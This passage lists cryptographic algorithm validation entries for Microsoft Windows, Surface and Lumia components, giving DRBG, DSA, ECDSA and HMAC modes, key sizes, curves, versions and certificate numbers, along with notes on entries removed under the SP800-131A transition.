Implementation: Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10 Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/ Windows 10 Mobile Anniversary Update SymCrypt Cryptographic Implementations #1217
Version: 10.0.14393

CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; BlockCipher_Use_df: ( AES-256 ) ( AES Val#3629 ) ]
Implementation: Microsoft Windows 10 November 2015 Update; Microsoft Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface Pro 2, and Surface Pro w/ Windows 10 November 2015 Update; Windows 10 Mobile for Microsoft Lumia 950 and Microsoft Lumia 635; Windows 10 for Microsoft Surface Hub and Surface Hub SymCrypt Cryptographic Implementations #955
Version: 10.0.10586

CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; BlockCipher_Use_df: ( AES-256 ) ( AES Val#3497 ) ]
Implementation: Microsoft Windows 10, Microsoft Surface Pro 3 with Windows 10, Microsoft Surface 3 with Windows 10, Microsoft Surface Pro 2 with Windows 10, Microsoft Surface Pro with Windows 10 SymCrypt Cryptographic Implementations #868
Version: 10.0.10240

CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; BlockCipher_Use_df: ( AES-256 ) ( AES Val#2832 ) ]
Implementation: Windows Storage Server 2012 R2, Microsoft Windows RT 8.1, Microsoft Surface with Windows RT 8.1, Microsoft Surface Pro with Windows 8.1, Microsoft Surface 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft Windows Phone 8.1, Microsoft Windows Embedded 8.1 Industry and Microsoft StorSimple 8100 SymCrypt Cryptographic Implementations #489
Version: 6.3.9600

CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; BlockCipher_Use_df: ( AES-256 ) ( AES Val#2197 ) ]
Implementation: Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 Next Generation Symmetric Cryptographic Algorithms Implementations (SYMCRYPT) #258

CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; BlockCipher_No_df: ( AES-256 ) ( AES Val#2023 ) ]
Implementation: Windows Embedded Compact 7 Cryptographic Primitives Library (bcrypt.dll) #193

CTR_DRBG: [ Prediction Resistance Tested: Not Enabled; BlockCipher_No_df: ( AES-256 ) ( AES Val#1168 ) ]
Implementation: Windows 7 Ultimate and SP1 and Windows Server 2008 R2 and SP1 RNG Library #23

DRBG (SP 800-90)
Implementation: Windows Vista Ultimate SP1, vendor-affirmed


Digital Signature Algorithm (DSA)

Modes / States / Key Sizes | Algorithm Implementation and Certificate #

DSA:
  186-4:
    PQGGen:
      L = 2048, N = 256 SHA: SHA-256
      L = 3072, N = 256 SHA: SHA-256
    PQGVer:
      L = 2048, N = 256 SHA: SHA-256
      L = 3072, N = 256 SHA: SHA-256
    SigGen:
      L = 2048, N = 256 SHA: SHA-256
      L = 3072, N = 256 SHA: SHA-256
    SigVer:
      L = 2048, N = 256 SHA: SHA-256
      L = 3072, N = 256 SHA: SHA-256
    KeyPair:
      L = 2048, N = 256
      L = 3072, N = 256
Prerequisite: SHS #4011, DRBG #1732
Implementation: Microsoft Surface Hub SymCrypt Cryptographic Implementations #1303
Version: 10.0.15063.674

DSA:
  186-4:
    PQGGen:
      L = 2048, N = 256 SHA: SHA-256
      L = 3072, N = 256 SHA: SHA-256
    PQGVer:
      L = 2048, N = 256 SHA: SHA-256
      L = 3072, N = 256 SHA: SHA-256
    SigGen:
      L = 2048, N = 256 SHA: SHA-256
      L = 3072, N = 256 SHA: SHA-256
    SigVer:
      L = 2048, N = 256 SHA: SHA-256
      L = 3072, N = 256 SHA: SHA-256
    KeyPair:
      L = 2048, N = 256
      L = 3072, N = 256
Prerequisite: SHS #4010, DRBG #1731
Implementation: Windows 10 Mobile (version 1709) SymCrypt Cryptographic Implementations #1302
Version: 10.0.15254

DSA:
  186-4:
    PQGGen:
      L = 2048, N = 256 SHA: SHA-256
      L = 3072, N = 256 SHA: SHA-256
    PQGVer:
      L = 2048, N = 256 SHA: SHA-256
      L = 3072, N = 256 SHA: SHA-256
    SigGen:
      L = 2048, N = 256 SHA: SHA-256
      L = 3072, N = 256 SHA: SHA-256
    SigVer:
      L = 2048, N = 256 SHA: SHA-256
      L = 3072, N = 256 SHA: SHA-256
    KeyPair:
      L = 2048, N = 256
      L = 3072, N = 256
Prerequisite: SHS #4009, DRBG #1730
Implementation: Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); SymCrypt Cryptographic Implementations #1301
Version: 10.0.16299

FIPS186-4:
  PQG(gen)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ) ]
  PQG(ver)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ) ]
  KeyPairGen: [ (2048,256) ; (3072,256) ]
  SIG(gen)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ); ]
  SIG(ver)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ) ]
  SHS: Val#3790
  DRBG: Val# 1555
Implementation: Windows 10 Creators Update (version 1703) Home, Pro, Enterprise, Education, Windows 10 S, Windows 10 Mobile SymCrypt Cryptographic Implementations #1223
Version: 10.0.15063

FIPS186-4:
  PQG(ver)PARMS TESTED: [ (1024,160) SHA( 1 ); ]
  SIG(ver)PARMS TESTED: [ (1024,160) SHA( 1 ); ]
  SHS: Val# 3649
Implementation: Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll) #1188
Version: 7.00.2872

FIPS186-4:
  PQG(ver)PARMS TESTED: [ (1024,160) SHA( 1 ); ]
  SIG(ver)PARMS TESTED: [ (1024,160) SHA( 1 ); ]
  SHS: Val#3648
Implementation: Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll) #1187
Version: 8.00.6246

FIPS186-4:
  PQG(gen)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ) ]
  PQG(ver)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ) ]
  KeyPairGen: [ (2048,256) ; (3072,256) ]
  SIG(gen)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ); ]
  SIG(ver)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ) ]
  SHS: Val# 3347
  DRBG: Val# 1217
Implementation: Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10 Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/ Windows 10 Mobile Anniversary Update MsBignum Cryptographic Implementations #1098
Version: 10.0.14393

FIPS186-4:
  PQG(gen)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ) ]
  PQG(ver)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ) ]
  KeyPairGen: [ (2048,256) ; (3072,256) ]
  SIG(gen)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ); ]
  SIG(ver)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ) ]
  SHS: Val# 3047
  DRBG: Val# 955
Implementation: Microsoft Windows 10 November 2015 Update; Microsoft Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface Pro 2, and Surface Pro w/ Windows 10 November 2015 Update; Windows 10 Mobile for Microsoft Lumia 950 and Microsoft Lumia 635; Windows 10 for Microsoft Surface Hub 84” and Surface Hub 55” MsBignum Cryptographic Implementations #1024
Version: 10.0.10586

FIPS186-4:
  PQG(gen)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ) ]
  PQG(ver)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ) ]
  KeyPairGen: [ (2048,256) ; (3072,256) ]
  SIG(gen)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ); ]
  SIG(ver)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ) ]
  SHS: Val# 2886
  DRBG: Val# 868
Implementation: Microsoft Windows 10, Microsoft Surface Pro 3 with Windows 10, Microsoft Surface 3 with Windows 10, Microsoft Surface Pro 2 with Windows 10, Microsoft Surface Pro with Windows 10 MsBignum Cryptographic Implementations #983
Version: 10.0.10240

FIPS186-4:
  PQG(gen)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ) ]
  PQG(ver)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ) ]
  KeyPairGen: [ (2048,256) ; (3072,256) ]
  SIG(gen)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ); ]
  SIG(ver)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ) ]
  SHS: Val# 2373
  DRBG: Val# 489
Implementation: Microsoft Windows 8.1, Microsoft Windows Server 2012 R2, Microsoft Windows Storage Server 2012 R2, Microsoft Windows RT 8.1, Microsoft Surface with Windows RT 8.1, Microsoft Surface Pro with Windows 8.1, Microsoft Surface 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft Windows Phone 8.1, Microsoft Windows Embedded 8.1 Industry and Microsoft StorSimple 8100 MsBignum Cryptographic Implementations #855
Version: 6.3.9600

FIPS186-2:
  PQG(ver) MOD(1024);
  SIG(ver) MOD(1024);
  SHS: #1903
  DRBG: #258
FIPS186-4:
  PQG(gen)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ) ]
  PQG(ver)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ) ]
  SIG(gen)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ); ]
  SIG(ver)PARMS TESTED: [ (2048,256) SHA( 256 ); (3072,256) SHA( 256 ) ]
  SHS: #1903
  DRBG: #258
Some of the previously validated components for this validation have been removed because they are now non-compliant per the SP800-131A transition. See Historical DSA List Val#687.
Implementation: Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 Cryptography Next Generation (CNG) Implementations #687

FIPS186-2:
  PQG(ver) MOD(1024);
  SIG(ver) MOD(1024);
  SHS: #1902
  DRBG: #258
Some of the previously validated components for this validation have been removed because they are now non-compliant per the SP800-131A transition. See Historical DSA List Val#686.
Implementation: Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 DSS and Diffie-Hellman Enhanced Cryptographic Provider (DSSENH) #686

FIPS186-2:
  SIG(ver) MOD(1024);
  SHS: Val# 1773
  DRBG: Val# 193
Some of the previously validated components for this validation have been removed because they are now non-compliant per the SP800-131A transition. See Historical DSA List Val#645.
Implementation: Windows Embedded Compact 7 Cryptographic Primitives Library (bcrypt.dll) #645

FIPS186-2:
  SIG(ver) MOD(1024);
  SHS: Val# 1081
  DRBG: Val# 23
Some of the previously validated components for this validation have been removed because they are now non-compliant per the SP800-131A transition. See Historical DSA List Val#391. See Historical DSA List Val#386.
Implementation: Windows Server 2008 R2 and SP1 CNG algorithms #391
Implementation: Windows 7 Ultimate and SP1 CNG algorithms #386

FIPS186-2:
  SIG(ver) MOD(1024);
  SHS: Val# 1081
  RNG: Val# 649
Some of the previously validated components for this validation have been removed because they are now non-compliant per the SP800-131A transition. See Historical DSA List Val#390. See Historical DSA List Val#385.
Implementation: Windows Server 2008 R2 and SP1 Enhanced DSS (DSSENH) #390
Implementation: Windows 7 Ultimate and SP1 Enhanced DSS (DSSENH) #385

FIPS186-2:
  SIG(ver) MOD(1024);
  SHS: Val# 753
Some of the previously validated components for this validation have been removed because they are now non-compliant per the SP800-131A transition. See Historical DSA List Val#284. See Historical DSA List Val#283.
Implementation: Windows Server 2008 CNG algorithms #284
Implementation: Windows Vista Ultimate SP1 CNG algorithms #283

FIPS186-2:
  SIG(ver) MOD(1024);
  SHS: Val# 753
  RNG: Val# 435
Some of the previously validated components for this validation have been removed because they are now non-compliant per the SP800-131A transition. See Historical DSA List Val#282. See Historical DSA List Val#281.
Implementation: Windows Server 2008 Enhanced DSS (DSSENH) #282
Implementation: Windows Vista Ultimate SP1 Enhanced DSS (DSSENH) #281

FIPS186-2:
  SIG(ver) MOD(1024);
  SHS: Val# 618
  RNG: Val# 321
Some of the previously validated components for this validation have been removed because they are now non-compliant per the SP800-131A transition. See Historical DSA List Val#227. See Historical DSA List Val#226.
Implementation: Windows Vista CNG algorithms #227
Implementation: Windows Vista Enhanced DSS (DSSENH) #226

FIPS186-2:
  SIG(ver) MOD(1024);
  SHS: Val# 784
  RNG: Val# 448
Some of the previously validated components for this validation have been removed because they are now non-compliant per the SP800-131A transition. See Historical DSA List Val#292.
Implementation: Windows XP Professional SP3 Enhanced DSS and Diffie-Hellman Cryptographic Provider (DSSENH) #292

FIPS186-2:
  SIG(ver) MOD(1024);
  SHS: Val# 783
  RNG: Val# 447
Some of the previously validated components for this validation have been removed because they are now non-compliant per the SP800-131A transition. See Historical DSA List Val#291.
Implementation: Windows XP Professional SP3 Enhanced Cryptographic Provider (RSAENH) #291

FIPS186-2:
  PQG(gen) MOD(1024);
  PQG(ver) MOD(1024);
  KEYGEN(Y) MOD(1024);
  SIG(gen) MOD(1024);
  SIG(ver) MOD(1024);
  SHS: Val# 611
  RNG: Val# 314
Implementation: Windows 2003 SP2 Enhanced DSS and Diffie-Hellman Cryptographic Provider #221

FIPS186-2:
  PQG(gen) MOD(1024);
  PQG(ver) MOD(1024);
  KEYGEN(Y) MOD(1024);
  SIG(gen) MOD(1024);
  SIG(ver) MOD(1024);
  SHS: Val# 385
Implementation: Windows Server 2003 SP1 Enhanced DSS and Diffie-Hellman Cryptographic Provider (DSSENH) #146

FIPS186-2:
  PQG(ver) MOD(1024);
  KEYGEN(Y) MOD(1024);
  SIG(gen) MOD(1024);
  SIG(ver) MOD(1024);
  SHS: Val# 181
Implementation: Windows Server 2003 Enhanced DSS and Diffie-Hellman Cryptographic Provider (DSSENH) #95

FIPS186-2:
  PQG(gen) MOD(1024);
  PQG(ver) MOD(1024);
  KEYGEN(Y) MOD(1024);
  SIG(gen) MOD(1024);
    SHS: SHA-1 (BYTE)
  SIG(ver) MOD(1024);
    SHS: SHA-1 (BYTE)
Implementation: Windows 2000 DSSENH.DLL #29
Implementation: Windows 2000 DSSBASE.DLL #28
Implementation: Windows NT 4 SP6 DSSENH.DLL #26
Implementation: Windows NT 4 SP6 DSSBASE.DLL #25

FIPS186-2: PRIME;
FIPS186-2:
  KEYGEN(Y):
    SHS: SHA-1 (BYTE)
  SIG(gen):
  SIG(ver) MOD(1024);
    SHS: SHA-1 (BYTE)
Implementation: Windows NT 4.0 SP4 Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider #17

Elliptic Curve Digital Signature Algorithm (ECDSA)

Modes / States / Key Sizes | Algorithm Implementation and Certificate #

ECDSA:
  186-4:
    Key Pair Generation:
      Curves: P-256, P-384, P-521
      Generation Methods: Extra Random Bits
    Public Key Validation:
      Curves: P-256, P-384, P-521
    Signature Generation:
      P-256 SHA: SHA-256
      P-384 SHA: SHA-384
      P-521 SHA: SHA-512
    Signature Verification:
      P-256 SHA: SHA-256
      P-384 SHA: SHA-384
      P-521 SHA: SHA-512
Prerequisite: SHS #2373, DRBG #489
Implementation: Microsoft Windows 8.1, Microsoft Windows Server 2012 R2, Microsoft Windows Storage Server 2012 R2, Microsoft Windows RT 8.1, Microsoft Surface with Windows RT 8.1, Microsoft Surface Pro with Windows 8.1, Microsoft Surface 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft Windows Phone 8.1, Microsoft Windows Embedded 8.1 Industry and Microsoft StorSimple 8100 MsBignum Cryptographic Implementations #1263
Version: 6.3.9600

ECDSA:
  186-4:
    Key Pair Generation:
      Curves: P-256, P-384
      Generation Methods: Testing Candidates
Prerequisite: SHS #4011, DRBG #1734
Implementation: Microsoft Surface Hub Virtual TPM Implementations #1253
Version: 10.0.15063.674

ECDSA:
  186-4:
    Key Pair Generation:
      Curves: P-256, P-384
      Generation Methods: Testing Candidates
Prerequisite: SHS #4009, DRBG #1733
Implementation: Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); Virtual TPM Implementations #1252
Version: 10.0.16299

ECDSA:
  186-4:
    Key Pair Generation:
      Curves: P-256, P-384, P-521
      Generation Methods: Extra Random Bits
    Public Key Validation:
      Curves: P-256, P-384, P-521
    Signature Generation:
      P-256 SHA: SHA-256
      P-384 SHA: SHA-384
      P-521 SHA: SHA-512
    Signature Verification:
      P-256 SHA: SHA-256
      P-384 SHA: SHA-384
      P-521 SHA: SHA-512
Prerequisite: SHS #4011, DRBG #1732
Implementation: Microsoft Surface Hub MsBignum Cryptographic Implementations #1251
Version: 10.0.15063.674

ECDSA:
  186-4:
    Key Pair Generation:
      Curves: P-256, P-384, P-521
      Generation Methods: Extra Random Bits
    Public Key Validation:
      Curves: P-256, P-384, P-521
    Signature Generation:
      P-256 SHA: SHA-256
      P-384 SHA: SHA-384
      P-521 SHA: SHA-512
    Signature Verification:
      P-256 SHA: SHA-256
      P-384 SHA: SHA-384
      P-521 SHA: SHA-512
Prerequisite: SHS #4011, DRBG #1732
Implementation: Microsoft Surface Hub SymCrypt Cryptographic Implementations #1250
Version: 10.0.15063.674

ECDSA:
  186-4:
    Key Pair Generation:
      Curves: P-256, P-384, P-521
      Generation Methods: Extra Random Bits
    Public Key Validation:
      Curves: P-256, P-384, P-521
    Signature Generation:
      P-256 SHA: SHA-256
      P-384 SHA: SHA-384
      P-521 SHA: SHA-512
    Signature Verification:
      P-256 SHA: SHA-256
      P-384 SHA: SHA-384
      P-521 SHA: SHA-512
Prerequisite: SHS #4010, DRBG #1731
Implementation: Windows 10 Mobile (version 1709) SymCrypt Cryptographic Implementations #1249
Version: 10.0.15254

ECDSA:
  186-4:
    Key Pair Generation:
      Curves: P-256, P-384, P-521
      Generation Methods: Extra Random Bits
    Public Key Validation:
      Curves: P-256, P-384, P-521
    Signature Generation:
      P-256 SHA: SHA-256
      P-384 SHA: SHA-384
      P-521 SHA: SHA-512
    Signature Verification:
      P-256 SHA: SHA-256
      P-384 SHA: SHA-384
      P-521 SHA: SHA-512
Prerequisite: SHS #4010, DRBG #1731
Implementation: Windows 10 Mobile (version 1709) MsBignum Cryptographic Implementations #1248
Version: 10.0.15254

ECDSA:
  186-4:
    Key Pair Generation:
      Curves: P-256, P-384, P-521
      Generation Methods: Extra Random Bits
    Public Key Validation:
      Curves: P-256, P-384, P-521
    Signature Generation:
      P-256 SHA: SHA-256
      P-384 SHA: SHA-384
      P-521 SHA: SHA-512
    Signature Verification:
      P-256 SHA: SHA-256
      P-384 SHA: SHA-384
      P-521 SHA: SHA-512
Prerequisite: SHS #4009, DRBG #1730
Implementation: Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); MsBignum Cryptographic Implementations #1247
Version: 10.0.16299

ECDSA:
  186-4:
    Key Pair Generation:
      Curves: P-256, P-384, P-521
      Generation Methods: Extra Random Bits
    Public Key Validation:
      Curves: P-256, P-384, P-521
    Signature Generation:
      P-256 SHA: SHA-256
      P-384 SHA: SHA-384
      P-521 SHA: SHA-512
    Signature Verification:
      P-256 SHA: SHA-256
      P-384 SHA: SHA-384
      P-521 SHA: SHA-512
Prerequisite: SHS #4009, DRBG #1730
Implementation: Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); SymCrypt Cryptographic Implementations #1246
Version: 10.0.16299

FIPS186-4:
  PKG: CURVES( P-256 P-384 TestingCandidates )
  SHS: Val#3790
  DRBG: Val# 1555
Implementation: Windows 10 Creators Update (version 1703) Pro, Enterprise, Education Virtual TPM Implementations #1136
Version: 10.0.15063

FIPS186-4:
  PKG: CURVES( P-256 P-384 P-521 ExtraRandomBits )
  PKV: CURVES( P-256 P-384 P-521 )
  SigGen: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-521: (SHA-512) )
  SigVer: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-521: (SHA-512) )
  SHS: Val#3790
  DRBG: Val# 1555
Implementation: Windows 10 Creators Update (version 1703) Home, Pro, Enterprise, Education, Windows 10 S, Windows 10 Mobile MsBignum Cryptographic Implementations #1135
Version: 10.0.15063

FIPS186-4:
  PKG: CURVES( P-256 P-384 P-521 ExtraRandomBits )
  PKV: CURVES( P-256 P-384 P-521 )
  SigGen: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-521: (SHA-512) )
  SigVer: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-521: (SHA-512) )
  SHS: Val#3790
  DRBG: Val# 1555
Implementation: Windows 10 Creators Update (version 1703) Home, Pro, Enterprise, Education, Windows 10 S, Windows 10 Mobile SymCrypt Cryptographic Implementations #1133
Version: 10.0.15063

FIPS186-4:
  PKG: CURVES( P-256 P-384 P-521 ExtraRandomBits )
  PKV: CURVES( P-256 P-384 P-521 )
  SigGen: CURVES( P-256: (SHA-1, 256) P-384: (SHA-1, 384) P-521: (SHA-1, 512) ) SIG(gen) with SHA-1 affirmed for use with protocols only.
  SigVer: CURVES( P-256: (SHA-1, 256) P-384: (SHA-1, 384) P-521: (SHA-1, 512) )
  SHS: Val# 3649
  DRBG: Val# 1430
Implementation: Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll) #1073
Version: 7.00.2872

FIPS186-4:
  PKG: CURVES( P-256 P-384 P-521 ExtraRandomBits )
  PKV: CURVES( P-256 P-384 P-521 )
  SigGen: CURVES( P-256: (SHA-1, 256) P-384: (SHA-1, 384) P-521: (SHA-1, 512) ) SIG(gen) with SHA-1 affirmed for use with protocols only.
  SigVer: CURVES( P-256: (SHA-1, 256) P-384: (SHA-1, 384) P-521: (SHA-1, 512) )
  SHS: Val#3648
  DRBG: Val# 1429
Implementation: Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll) #1072
Version: 8.00.6246

FIPS186-4:
  PKG: CURVES( P-256 P-384 TestingCandidates )
  PKV: CURVES( P-256 P-384 )
  SigGen: CURVES( P-256: (SHA-1, 256) P-384: (SHA-1, 256, 384) ) SIG(gen) with SHA-1 affirmed for use with protocols only.
  SigVer: CURVES( P-256: (SHA-1, 256) P-384: (SHA-1, 256, 384) )
  SHS: Val# 3347
  DRBG: Val# 1222
Implementation: Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4 and Surface Pro 3 w/ Windows 10 Anniversary Update Virtual TPM Implementations #920
Version: 10.0.14393

FIPS186-4:
  PKG: CURVES( P-256 P-384 P-521 ExtraRandomBits )
  PKV: CURVES( P-256 P-384 P-521 )
  SigGen: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-521: (SHA-512) )
  SigVer: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-521: (SHA-512) )
  SHS: Val# 3347
  DRBG: Val# 1217
Implementation: Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10 Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/ Windows 10 Mobile Anniversary Update MsBignum Cryptographic Implementations #911
Version: 10.0.14393

FIPS186-4:
  PKG: CURVES( P-256 P-384 P-521 ExtraRandomBits )
  SigGen: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-521: (SHA-512) )
  SigVer: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-521: (SHA-512) )
  SHS: Val# 3047
  DRBG: Val# 955
Implementation: Microsoft Windows 10 November 2015 Update; Microsoft Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface Pro 2, and Surface Pro w/ Windows 10 November 2015 Update; Windows 10 Mobile for Microsoft Lumia 950 and Microsoft Lumia 635; Windows 10 for Microsoft Surface Hub 84” and Surface Hub 55” MsBignum Cryptographic Implementations #760
Version: 10.0.10586

FIPS186-4:
  PKG: CURVES( P-256 P-384 P-521 ExtraRandomBits )
  SigGen: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-521: (SHA-512) )
  SigVer: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-521: (SHA-512) )
  SHS: Val# 2886
  DRBG: Val# 868
Implementation: Microsoft Windows 10, Microsoft Surface Pro 3 with Windows 10, Microsoft Surface 3 with Windows 10, Microsoft Surface Pro 2 with Windows 10, Microsoft Surface Pro with Windows 10 MsBignum Cryptographic Implementations #706
Version: 10.0.10240

FIPS186-4:
  PKG: CURVES( P-256 P-384 P-521 ExtraRandomBits )
  SigGen: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-521: (SHA-512) )
  SigVer: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-521: (SHA-512) )
  SHS: Val#2373
  DRBG: Val# 489
Implementation: Microsoft Windows 8.1, Microsoft Windows Server 2012 R2, Microsoft Windows Storage Server 2012 R2, Microsoft Windows RT 8.1, Microsoft Surface with Windows RT 8.1, Microsoft Surface Pro with Windows 8.1, Microsoft Surface 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft Windows Phone 8.1, Microsoft Windows Embedded 8.1 Industry and Microsoft StorSimple 8100 MsBignum Cryptographic Implementations #505
Version: 6.3.9600

FIPS186-2:
  PKG: CURVES( P-256 P-384 P-521 )
    SHS: #1903
    DRBG: #258
  SIG(ver): CURVES( P-256 P-384 P-521 )
    SHS: #1903
    DRBG: #258
FIPS186-4:
  PKG: CURVES( P-256 P-384 P-521 ExtraRandomBits )
  SigGen: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-521: (SHA-512) )
  SigVer: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-521: (SHA-512) )
  SHS: #1903
  DRBG: #258
Some of the previously validated components for this validation have been removed because they are now non-compliant per the SP800-131A transition. See Historical ECDSA List Val#341.
Implementation: Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 Cryptography Next Generation (CNG) Implementations #341

FIPS186-2:
  PKG: CURVES( P-256 P-384 P-521 )
    SHS: Val#1773
    DRBG: Val# 193
  SIG(ver): CURVES( P-256 P-384 P-521 )
    SHS: Val#1773
    DRBG: Val# 193
FIPS186-4:
  PKG: CURVES( P-256 P-384 P-521 ExtraRandomBits )
  SigGen: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-521: (SHA-512) )
  SigVer: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-521: (SHA-512) )
  SHS: Val#1773
  DRBG: Val# 193
Some of the previously validated components for this validation have been removed because they are now non-compliant per the SP800-131A transition. See Historical ECDSA List Val#295.
Implementation: Windows Embedded Compact 7 Cryptographic Primitives Library (bcrypt.dll) #295

FIPS186-2:
  PKG: CURVES( P-256 P-384 P-521 )
    SHS: Val#1081
    DRBG: Val# 23
  SIG(ver): CURVES( P-256 P-384 P-521 )
    SHS: Val#1081
    DRBG: Val# 23
Some of the previously validated components for this validation have been removed because they are now non-compliant per the SP800-131A transition. See Historical ECDSA List Val#142. See Historical ECDSA List Val#141.
Implementation: Windows Server 2008 R2 and SP1 CNG algorithms #142
Implementation: Windows 7 Ultimate and SP1 CNG algorithms #141

FIPS186-2:
  PKG: CURVES( P-256 P-384 P-521 )
    SHS: Val#753
  SIG(ver): CURVES( P-256 P-384 P-521 )
    SHS: Val#753
Some of the previously validated components for this validation have been removed because they are now non-compliant per the SP800-131A transition. See Historical ECDSA List Val#83. See Historical ECDSA List Val#82.
Implementation: Windows Server 2008 CNG algorithms #83
Implementation: Windows Vista Ultimate SP1 CNG algorithms #82

FIPS186-2:
  PKG: CURVES( P-256 P-384 P-521 )
    SHS: Val#618
    RNG: Val# 321
  SIG(ver): CURVES( P-256 P-384 P-521 )
    SHS: Val#618
    RNG: Val# 321
Some of the previously validated components for this validation have been removed because they are now non-compliant per the SP800-131A transition. See Historical ECDSA List Val#60.
Implementation: Windows Vista CNG algorithms #60

Keyed-Hash Message Authentication Code (HMAC)

Modes / States / Key Sizes | Algorithm Implementation and Certificate #

HMAC-SHA-1:
  Key Sizes < Block Size
  Key Sizes > Block Size
  Key Sizes = Block Size
HMAC-SHA2-256:
  Key Sizes < Block Size
  Key Sizes > Block Size
  Key Sizes = Block Size
HMAC-SHA2-384:
  Key Sizes < Block Size
  Key Sizes > Block Size
  Key Sizes = Block Size
Prerequisite: SHS #4011
Implementation: Microsoft Surface Hub Virtual TPM Implementations #3271
Version: 10.0.15063.674

HMAC-SHA-1:
  Key Sizes < Block Size
  Key Sizes > Block Size
  Key Sizes = Block Size
HMAC-SHA2-256:
  Key Sizes < Block Size
  Key Sizes > Block Size
  Key Sizes = Block Size
HMAC-SHA2-384:
  Key Sizes < Block Size
  Key Sizes > Block Size
  Key Sizes = Block Size
Prerequisite: SHS #4009
Implementation: Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); Virtual TPM Implementations #3270
Version: 10.0.16299

HMAC-SHA-1:
  Key Sizes < Block Size
  Key Sizes > Block Size
  Key Sizes = Block Size
HMAC-SHA2-256:
  Key Sizes < Block Size
  Key Sizes > Block Size
  Key Sizes = Block Size
HMAC-SHA2-384:
  Key Sizes < Block Size
  Key Sizes > Block Size
  Key Sizes = Block Size
HMAC-SHA2-512:
  Key Sizes < Block Size
  Key Sizes > Block Size
  Key Sizes = Block Size
